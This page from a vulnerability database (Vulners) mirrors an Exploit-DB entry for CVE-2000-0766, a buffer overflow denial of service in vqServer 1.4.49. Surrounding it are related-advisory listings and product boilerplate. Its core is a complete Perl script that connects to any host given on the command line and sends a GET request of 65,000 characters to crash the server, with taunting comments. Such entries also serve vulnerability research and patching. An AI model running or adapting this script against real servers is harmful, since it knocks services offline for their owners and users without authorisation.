Lucene search
+L

vqSoft vqServer 1.4.49 - Denial of Service

🗓️ 19 Aug 2000 00:00:00Reported by sinfonyType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 27 Views

vqServer 1.4.49 is vulnerable to Denial of Service from a buffer overflow in GET requests.

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2000-0766
22 Jan 200105:00
cve
Cvelist
CVE-2000-0766
22 Jan 200105:00
cvelist
EUVD
EUVD-2000-0760
7 Oct 202500:30
euvd
NVD
CVE-2000-0766
20 Oct 200004:00
nvd
OpenVAS
vqServer administrative port
3 Nov 200500:00
openvas
OpenVAS
vqServer < 1.9.53 Buffer Overflow Vulnerability
28 Sep 202000:00
openvas
source: https://www.securityfocus.com/bid/1610/info

vqServer 1.4.49 is subject to a buffer overflow. If a GET request is sent to the server containing 65 000 characters the server will stop responding. A reboot is required in order to gain normal functionality.


#!/usr/bin/perl
# DoS exploit for vqServer 1.4.49
# This vulnerability was discovered by nemesystm
# ([email protected])
#
# code by: sinfony    ([email protected])
# [confess.sins.labs] (http://www.ro0t.nu/csl)
# and DHC member
#
# kiddie quote of the year:
# <gammbitr> dude piffy stfu i bet you don't even know how to exploit it

die "vqServer 1.4.49 DoS by sinfony (chinesef00d\@hotmail.com)\n
usage: $0 <host> \n"
if $#ARGV != 0;

use IO::Socket;

$host = $ARGV[0];
$port = 80;

print "Connecting to $host on port $port...\n";
$suck = IO::Socket::INET->
	new(Proto=>"tcp",
	PeerAddr=>$host,
	PeerPort=>$port)
	|| die "$host isnt a webserver you schmuck.\n";

$a = A;
$send = $a x 65000;
	print "Connected, sending exploit.\n";
	print $suck "GET /$send\n";
sleep(3);
	print "Exploit sent. vqServer should be dead.\n";
close($suck)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Aug 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.07343
27